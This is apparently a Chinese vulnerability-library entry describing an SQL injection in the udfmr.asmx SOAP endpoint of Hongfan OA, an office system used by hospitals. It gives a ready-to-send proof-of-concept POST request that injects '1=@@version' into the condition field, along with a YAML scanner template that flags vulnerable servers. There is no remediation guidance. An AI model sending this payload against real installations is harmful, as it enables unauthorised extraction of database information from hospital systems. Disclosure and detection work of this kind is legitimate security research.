红帆OA_udfmr.asmx_SQL注入漏洞–zhangy1da-漏洞文库小世界-安全文库-NGC660安全实验室

红帆OA_udfmr.asmx_SQL注入漏洞–zhangy1da

0x01 漏洞描述

红帆OA系统为医院提供OA功能,完成信息发布、流程审批、公文管理、日程管理、工作安排、文件传递、在线沟通等行政办公业务。其旧版本的udfmr.asmx接口存在SQL注入漏洞,攻击者可利用其获取数据库相关信息。

0x02 影响范围

红帆OA系统

0x03 漏洞复现

验证POC:

POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: 386
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=@@version</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>

1679381071071-929fd3da-11cd-46d8-839f-5baee5028c20

0x04 POC检测

params: []
name: 红帆OA udfmr.asmx_SQL注入漏洞
set: {}
rules:
- method: POST
  path: /iOffice/prg/set/wss/udfmr.asmx
  headers:
    Content-Type: text/xml
  body: |-
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
          <condition>1=@@version</condition>
        </GetEmpSearch>
      </soap:Body>
    </soap:Envelope>
  search: ""
  followredirects: false
  expression: response.status == 500 && response.body.bcontains(b"nvarchar")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

1679381149743-6147a3de-fc01-480c-aa4c-863634ff3d94
1679381268780-1503d597-1c79-4b8b-94d1-dc5c9dab39d5

请登录后发表评论

    请登录后查看回复内容